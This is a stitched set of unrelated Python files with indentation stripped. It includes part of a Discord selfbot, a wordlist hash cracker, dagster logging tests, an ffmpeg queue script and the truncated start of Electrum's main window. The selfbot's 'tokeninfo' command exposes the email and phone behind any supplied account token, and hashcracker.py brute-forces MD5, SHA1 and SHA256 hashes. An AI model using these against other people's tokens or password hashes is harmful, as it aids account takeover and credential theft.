embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Deleted {deletedamount} messages")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="purgeself", description="Purge your messages.", usage="purgeself [amount]")
async def purge(ctx, amount: int):
history = await ctx.channel.history(limit=amount).flatten()
deletedamount = 0
for message in history:
if message.author.id == Ghost.user.id:
try:
deletedamount+=1
await message.delete()
await asyncio.sleep(1)
except:
pass
if __embedmode__:
embed = discord.Embed(title=f"Deleted {deletedamount} messages", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Deleted {deletedamount} messages")
@Ghost.command(name="lock", description="Lock the command channel.", usage="lock")
async def lock(ctx):
if ctx.author.guild_permissions.manage_channels:
await ctx.channel.set_permissions(ctx.guild.default_role, read_messages=False)
if __embedmode__:
embed = discord.Embed(title=f"Channel Locked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Channel Locked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="unlock", description="Unlock the command channel.", usage="unlock")
async def unlock(ctx):
if ctx.author.guild_permissions.manage_channels:
await ctx.channel.set_permissions(ctx.guild.default_role, read_messages=True)
if __embedmode__:
embed = discord.Embed(title=f"Channel Unlocked", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Channel Unlocked")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="lockdown", description="Lock the entire server.", usage="lockdown")
async def lockdown(ctx):
if ctx.author.guild_permissions.manage_guild:
for channel in ctx.guild.channels:
await channel.set_permissions(ctx.guild.default_role, read_messages=False)
channel = await ctx.guild.create_text_channel('lockdown-chat')
if __embedmode__:
embed = discord.Embed(title=f"Server Lockdown Enabled!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await channel.send(embed=embed, delete_after=__deletetimeout__)
else:
await channel.send("Server Lockdown Enabled!")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="unlockdown", description="Unlock the entire server.", usage="lockdown")
async def unlockdown(ctx):
if ctx.author.guild_permissions.manage_guild:
for channel in ctx.guild.channels:
await channel.set_permissions(ctx.guild.default_role, read_messages=True)
if __embedmode__:
embed = discord.Embed(title=f"Server Lockdown Disabled!", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Server Lockdown Disabled")
else:
if __embedmode__:
embed = discord.Embed(title="You dont have the required permissions", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Invalid permissions.")
@Ghost.command(name="tokeninfo", description="Information about a token.", usage="tokeninfo [token]")
async def tokeninfo(ctx, *, token):
request = requests.get("https://discord.com/api/users/@me", headers={"Authorization": token})
if request.status_code == 200:
request = request.json()
id = request["id"]
username = request["username"]
discriminator = request["discriminator"]
avatar = avatarUrl(id, request["avatar"])
publicflags = request["public_flags"]
bio = request["bio"]
nitro = ""
if "premium_type" in request:
if request["premium_type"] == 0:
nitro = "None"
elif request["premium_type"] == 1:
nitro = "Classic Nitro"
elif request["premium_type"] == 2:
nitro = "Nitro"
else:
nitro = "None"
email = request["email"]
phone = request["phone"]
if bio == "":
bio = " "
if __embedmode__:
embed = discord.Embed(title=user.name + " token information", color=__embedcolour__)
embed.add_field(name="Token", value="```" + str(token) + "```", inline=False)
embed.add_field(name="Username", value="```" + str(username) + "```")
embed.add_field(name="Email", value="```" + str(email) + "```")
embed.add_field(name="Phone", value="```" + str(phone) + "```")
embed.add_field(name="Discriminator", value="```" + str(discriminator) + "```")
embed.add_field(name="User ID", value="```" + str(id) + "```")
embed.add_field(name="Bio", value="```" + str(bio) + "```")
embed.add_field(name="Nitro", value="```" + str(nitro) + "```")
embed.set_thumbnail(url=avatar)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = user.created_at.strftime("%d %B, %Y")
await ctx.send(f"""```ini
[ {username}'s token Information ]
Token: {token}
Username: {username}
Email: {email}
Phone: {phone}
Discriminator: {discriminator}
User ID: {id}
Bio: {bio}
Nitro: {nitro}
# {__embedfooter__}```{avatar}""")
else:
await ctx.send("Failed to get information about this token. Probably invalid or from a delete user.")
@Ghost.command(name="userinfo", description="Information about the mentioned user.", usage="userinfo [@user]", aliases=["userlookup", "lookupuser"])
async def userinfo(ctx, *, user: discord.User):
if __embedmode__:
embed = discord.Embed(title=user.name + " Information", color=__embedcolour__)
embed.add_field(name="Username", value="```" + str(user.name) + "```")
embed.add_field(name="Discriminator", value="```" + str(user.discriminator) + "```")
embed.add_field(name="User ID", value="```" + str(user.id) + "```")
embed.add_field(name="Created At", value="```" + str(user.created_at.strftime("%d %B, %Y")) + "```")
embed.set_thumbnail(url=avatarUrl(user.id, user.avatar))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = user.created_at.strftime("%d %B, %Y")
await ctx.send(f"""```ini
[ {user.name} Information ]
Username: {user.name}
Discriminator: {user.discriminator}
User ID: {user.id}
Created At: {createdAt}
# {__embedfooter__}```{avatarUrl(user.id, user.avatar)}""")
@Ghost.command(name="serverinfo", description="Information about the command server.", usage="serverinfo (guild id)", aliases=["lookupserver", "guildinfo", "lookupguild", "serverlookup", "guildlookup"])
async def serverinfo(ctx, guild:int=None):
if guild == None:
server = ctx.message.guild
else:
server = await Ghost.fetch_guild(int(guild))
if __embedmode__:
embed = discord.Embed(title=server.name + " Information", color=__embedcolour__)
embed.add_field(name="Name", value="```" + str(server.name) + "```")
embed.add_field(name="Owner", value="```" + str(server.owner) + "```")
try:
embed.add_field(name="Member Count", value="```" + str(server.member_count) + "```")
except:
pass
embed.add_field(name="Server ID", value="```" + str(server.id) + "```")
embed.add_field(name="Created At", value="```" + str(server.created_at.strftime("%d %B, %Y")) + "```")
embed.set_thumbnail(url=str(server.icon))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
createdAt = server.created_at.strftime("%d %B, %Y")
try:
await ctx.send(f"""```ini
[ {server.name} Information ]
Name: {server.name}
Owner: {server.owner}
Member Count: {server.member_count}
Server ID: {server.id}
Created At: {createdAt}
# {__embedfooter__}```{str(server.icon)}""")
except:
await ctx.send(f"""```ini
[ {server.name} Information ]
Name: {server.name}
Owner: {server.owner}
Server ID: {server.id}
Created At: {createdAt}
# {__embedfooter__}```{str(server.icon)}""")
@Ghost.command(name="avatar", description="Get the mentioned user's avatar.", usage="avatar [@user]", aliases=["pfp", "profilepicture"])
async def avatar(ctx, *, user: discord.User):
if __embedmode__:
embed = discord.Embed(title=user.name + "'s Avatar", color=__embedcolour__)#
embed.set_image(url=avatarUrl(user.id, user.avatar))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(avatarUrl(user.id, user.avatar))
@Ghost.command(name="servericon", description="Get the server's icon.", usage="servericon", aliases=["guildicon"])
async def servericon(ctx):
if __embedmode__:
embed = discord.Embed(title=ctx.guild.name + "'s Icon", color=__embedcolour__)
embed.set_image(url=iconUrl(ctx.guild.id, ctx.guild.icon))
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(iconUrl(ctx.guild.id, ctx.guild.icon))
@Ghost.command(name="afkmode", description="Toggle afk mode.", usage="afkmode")
async def afkmode(ctx):
global afkMode
afkMode = not afkMode
cfg = Config.getConfig()
cfg["afkmode"]["enabled"] = afkMode
Config.saveConfig(cfg)
if afkMode:
await ctx.send("Afk mode has been enabled.")
else:
await ctx.send("Afk mode has been disabled.")
@Ghost.command(name="settings", description="The bot's settings.", usage="settings")
async def settings(ctx):
totalguilds = len(Ghost.guilds)
totalcommands = len(Ghost.commands) + len(ccmd)
uptime = int(round(time.time() - botStartTime))
uptimeText = str(timedelta(seconds=uptime))
delta_uptime = datetime.now() - Ghost.launch_time
hours, remainder = divmod(int(delta_uptime.total_seconds()), 3600)
minutes, seconds = divmod(remainder, 60)
days, hours = divmod(hours, 24)
logins = open('data/logins.txt', 'r')
logindata = logins.read()
base64_message = logindata
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
logindata_decoded = message_bytes.decode('ascii')
if __embedmode__:
embed = discord.Embed(title=f"Settings", color=__embedcolour__)
embed.add_field(name="Commands", value=f"```{totalcommands}```")
embed.add_field(name="Logins", value=f"```{logindata_decoded}```")
embed.add_field(name="Version", value=f"```{version}```")
embed.add_field(name="Prefix", value=f"```{Ghost.command_prefix}```")
embed.add_field(name="Servers", value=f"```{totalguilds}```")
#embed.add_field(name="Uptime", value=f"```{days}d, {hours}h, {minutes}m, {seconds}s```")
embed.add_field(name="Uptime", value=f"```{uptimeText}```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Settings ]
Commands: {totalcommands}
Logins: {logindata_decoded}
Version: {version}
Prefix: {Ghost.command_prefix}
Servers: {totalguilds}
Uptime: {days}d, {hours}h, {minutes}m, {seconds}s
# {__embedfooter__}```""", delete_after=__deletetimeout__)
'''@Ghost.command(name="snipers", description="All snipers.", usage="snipers")
async def snipers(ctx):
if __nitrosniper__ == True:
nitro = "Enabled"
else:
nitro = "Disabled"
if __privnotesniper__ == True:
privnote = "Enabled"
else:
privnote = "Disabled"
if __giveawaysniper__ == True:
giveaway = "Enabled"
else:
giveaway = "Disabled"
try:
embed = discord.Embed(title=f"Snipers", color=__embedcolour__)
embed.add_field(name="Nitro", value=f"```{nitro}```")
embed.add_field(name="Privnote", value=f"```{privnote}```")
embed.add_field(name="Giveaway", value=f"```{giveaway}```")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Snipers ]
Nitro: {nitro}
Privnote: {privnote}
Giveaway: {giveaway}
# {__embedfooter__}```""", delete_after=__deletetimeout__)'''
@Ghost.command(name="playing", description="Set a playing status.", usage="playing [text]")
async def playing(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await Ghost.change_presence(activity=discord.Game(text), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Playing Status", description=f"Status changed to: Playing {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Playing Status ]
Status changed to: Playing {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="streaming", description="Set a streaming status.", usage="streaming [text]")
async def streaming(ctx, url, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await Ghost.change_presence(activity=discord.Activity(type=1, name=f"{text}", url=f"{url}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Streaming Status", description=f"Status changed to: Streaming {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Streaming Status ]
Status changed to: Streaming {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="listening", description="Set a listening to status.", usage="listening [text]")
async def listening(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await Ghost.change_presence(activity=discord.Activity(type=2, name=f"{text}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Listening Status", description=f"Status changed to: Listening to {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Listening Status ]
Status changed to: Listening to {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="watching", description="Set a watching status.", usage="watching [text]")
async def watching(ctx, *, text):
if requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).status_code == 200:
status = requests.get("https://discord.com/api/users/@me/settings", headers={"Authorization": __token__}).json()["status"]
else:
status = "online"
await Ghost.change_presence(activity=discord.Activity(type=3, name=f"{text}"), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Watching Status", description=f"Status changed to: Watching {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send(f"""```ini
[ Watching Status ]
Status changed to: Watching {text}
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="clearstatus", description="Clear your status.", usage="clearstatus")
async def clearstatus(ctx):
await Ghost.change_presence(activity=discord.Activity(type=-1), status=discord.Status.try_value(status))
try:
embed = discord.Embed(title=f"Status Cleared", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
except discord.HTTPException:
await ctx.send("Status Cleared")
@Ghost.command(name="nickname", description="Set your nickname to anything.", usage="nickname [text]")
async def nickname(ctx, *, text):
await ctx.author.edit(nick=nickname)
if __embedmode__:
embed = discord.Embed(title=f"Nickname changed to {text}", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Nickname changed to {text}")
print(fg.cWhite + "")
@Ghost.command(name="clearnickname", description="Clear your nickname.", usage="clearnickname")
async def clearnickname(ctx):
await ctx.author.edit(nick="")
if __embedmode__:
embed = discord.Embed(title=f"Nickname cleared", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Nickname cleared")
Ghost.run(__token__)
except Exception as e:
if "improper token" in str(e).lower():
print("The Discord token that Ghost has been given to use is no longer working or is invalid.")
print("Please put a new token in to the config (config.json).")
else:
print(e)
logging.exception(str(e))
if os.name == "nt":
os.system("pause")
if os.name == "posix":
input("Press enter to close . . .")
|
hashcracker.py
|
import json
import hashlib
import os
import sys
import time
import threading
import multiprocessing
md, sh1, sh256 = [], [], []
unknown_hashtypes = []
with open("config.json") as c:
config = json.load(c)
wlpath = config["wordlistpath"]
hashpath = config["hashlistpath"]
if not os.path.exists(wlpath) or not os.path.exists(hashpath):
sys.exit("\nError, please check wordlist or hashlist path in config.json\n")
with open(hashpath) as h:
hashes = h.read().splitlines()
def makehash(word, mode):
word = word.encode("utf-8")
if mode == 32:
m = hashlib.md5()
m.update(word)
elif mode == 40:
m = hashlib.sha1()
m.update(word)
elif mode == 64:
m = hashlib.sha256()
m.update(word)
return m.hexdigest()
def crackhash(hshlist, wlpath, proclist):
start = time.time()
mode = len(hshlist[0])
with open(wlpath, encoding="utf-8", errors="ignore") as f:
for word in f:
word = word.rstrip()
curhash = makehash(word, mode)
if curhash in hshlist:
print(f"{curhash[0:15]}... : {word} ({round(time.time()-start, 2)}s)")
hshlist.remove(curhash)
if len(hshlist) != 0:
for hsh in hshlist:
proclist.append(hsh)
for hsh in hashes:
mode = len(hsh)
hashtypes = {
32: md,
40: sh1,
64: sh256
}
if mode != 32 and mode != 40 and mode != 64:
unknown_hashtypes.append(hsh)
else:
hashtypes[mode].append(hsh)
if __name__ == "__main__":
with multiprocessing.Manager() as manager:
px = []
unsolved_hashes = manager.list()
if len(md) != 0:
p = multiprocessing.Process(target=crackhash, args=(md, wlpath, unsolved_hashes,))
px.append(p)
if len(sh1) != 0:
p = multiprocessing.Process(target=crackhash, args=(sh1, wlpath, unsolved_hashes,))
px.append(p)
if len(sh256) != 0:
p = multiprocessing.Process(target=crackhash, args=(sh256, wlpath, unsolved_hashes,))
px.append(p)
for p in px:
p.start()
for p in px:
p.join()
if len(unsolved_hashes) != 0:
print("\n--UNSOLVED HASHES--")
for us in unsolved_hashes:
print(us)
if len(unknown_hashtypes) != 0:
print("\n--UNKNOWN HASH TYPES--")
for uk in unknown_hashtypes:
print(uk)
|
test_stdout.py
|
from __future__ import print_function
import os
import random
import string
import sys
import time
import pytest
from dagster import (
DagsterEventType,
ExecutionTargetHandle,
InputDefinition,
ModeDefinition,
execute_pipeline,
pipeline,
resource,
solid,
)
from dagster.core.execution.compute_logs import should_disable_io_stream_redirect
from dagster.core.instance import DagsterInstance
from dagster.core.storage.compute_log_manager import ComputeIOType
from dagster.utils import get_multiprocessing_context
HELLO_SOLID = 'HELLO SOLID'
HELLO_RESOURCE = 'HELLO RESOURCE'
SEPARATOR = os.linesep if (os.name == 'nt' and sys.version_info < (3,)) else '\n'
@resource
def resource_a(_):
print(HELLO_RESOURCE)
return 'A'
@solid
def spawn(_):
return 1
@solid(input_defs=[InputDefinition('num', int)], required_resource_keys={'a'})
def spew(_, num):
print(HELLO_SOLID)
return num
def define_pipeline():
@pipeline(mode_defs=[ModeDefinition(resource_defs={'a': resource_a})])
def spew_pipeline():
spew(spew(spawn()))
return spew_pipeline
def normalize_file_content(s):
return '\n'.join([line for line in s.replace(os.linesep, '\n').split('\n') if line])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk():
spew_pipeline = define_pipeline()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith('spawn'):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, 'r') as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk_multiprocess():
spew_pipeline = ExecutionTargetHandle.for_pipeline_python_file(
__file__, 'define_pipeline'
).build_pipeline_definition()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(
spew_pipeline,
environment_dict={'storage': {'filesystem': {}}, 'execution': {'multiprocess': {}}},
instance=instance,
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
for step_key in compute_steps:
if step_key.startswith('spawn'):
continue
compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
assert os.path.exists(compute_io_path)
with open(compute_io_path, 'r') as stdout_file:
assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager():
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
spew_pipeline = define_pipeline()
result = execute_pipeline(spew_pipeline, instance=instance)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 3
step_key = 'spew.compute'
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
stderr = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDERR)
cleaned_logs = stderr.data.replace('\x1b[34m', '').replace('\x1b[0m', '')
assert 'dagster - DEBUG - spew_pipeline - ' in cleaned_logs
bad_logs = manager.read_logs_file('not_a_run_id', step_key, ComputeIOType.STDOUT)
assert bad_logs.data is None
assert not manager.is_watch_completed('not_a_run_id', step_key)
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscriptions():
instance = DagsterInstance.local_temp()
spew_pipeline = define_pipeline()
step_key = 'spew.compute'
result = execute_pipeline(spew_pipeline, instance=instance)
stdout_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDOUT
)
stderr_observable = instance.compute_log_manager.observable(
result.run_id, step_key, ComputeIOType.STDERR
)
stdout = []
stdout_observable.subscribe(stdout.append)
stderr = []
stderr_observable.subscribe(stderr.append)
assert len(stdout) == 1
assert stdout[0].data.startswith(HELLO_SOLID)
assert stdout[0].cursor in [12, 13]
assert len(stderr) == 1
assert stderr[0].cursor == len(stderr[0].data)
assert stderr[0].cursor > 400
def gen_solid_name(length):
return ''.join(random.choice(string.ascii_lowercase) for x in range(length))
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_long_solid_names():
solid_name = gen_solid_name(300)
@pipeline(mode_defs=[ModeDefinition(resource_defs={'a': resource_a})])
def long_pipeline():
spew.alias(name=solid_name)()
instance = DagsterInstance.local_temp()
manager = instance.compute_log_manager
result = execute_pipeline(
long_pipeline,
instance=instance,
environment_dict={'solids': {solid_name: {'inputs': {'num': 1}}}},
)
assert result.success
compute_steps = [
event.step_key
for event in result.step_event_list
if event.event_type == DagsterEventType.STEP_START
]
assert len(compute_steps) == 1
step_key = compute_steps[0]
assert manager.is_watch_completed(result.run_id, step_key)
stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
assert normalize_file_content(stdout.data) == HELLO_SOLID
def execute_inner(step_key, pipeline_run, instance_ref):
instance = DagsterInstance.from_ref(instance_ref)
inner_step(instance, pipeline_run, step_key)
def inner_step(instance, pipeline_run, step_key):
with instance.compute_log_manager.watch(pipeline_run, step_key=step_key):
time.sleep(0.1)
print(step_key, 'inner 1')
print(step_key, 'inner 2')
print(step_key, 'inner 3')
time.sleep(0.1)
def expected_inner_output(step_key):
return '\n'.join(
["{step_key} inner {num}".format(step_key=step_key, num=i + 1) for i in range(3)]
)
def expected_outer_prefix():
return '\n'.join(["outer {num}".format(num=i + 1) for i in range(3)])
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_single():
instance = DagsterInstance.local_temp()
pipeline_name = 'foo_pipeline'
pipeline_run = instance.create_run(pipeline_name=pipeline_name, pipeline_snapshot=None)
step_keys = ['A', 'B', 'C']
with instance.compute_log_manager.watch(pipeline_run):
print('outer 1')
print('outer 2')
print('outer 3')
for step_key in step_keys:
inner_step(instance, pipeline_run, step_key)
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_multi():
instance = DagsterInstance.local_temp()
pipeline_name = 'foo_pipeline'
pipeline_run = instance.create_run(pipeline_name=pipeline_name, pipeline_snapshot=None)
context = get_multiprocessing_context()
step_keys = ['A', 'B', 'C']
with instance.compute_log_manager.watch(pipeline_run):
print('outer 1')
print('outer 2')
print('outer 3')
for step_key in step_keys:
process = context.Process(
target=execute_inner, args=(step_key, pipeline_run, instance.get_ref())
)
process.start()
process.join()
for step_key in step_keys:
stdout = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, step_key, ComputeIOType.STDOUT
)
assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
full_out = instance.compute_log_manager.read_logs_file(
pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
)
# The way that the multiprocess compute-logging interacts with pytest (which stubs out the
# sys.stdout fileno) makes this difficult to test. The pytest-captured stdout only captures
# the stdout from the outer process, not also the inner process
assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
|
ffmpeg.py
|
import queue
import threading
import os
import compute
vids_path = './videos'
out = './processed'
def main():
q = queue.Queue()
directory = os.listdir(vids_path)
for file in directory:
q.put(vids_path+"/"+file)
for i in range(3):
worker = threading.Thread(target=compute.process, args=(q,vids_path))
worker.start()
worker.join()
if __name__ == "__main__":
main()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS, TYPE_SCRIPT
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds, PrintError,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
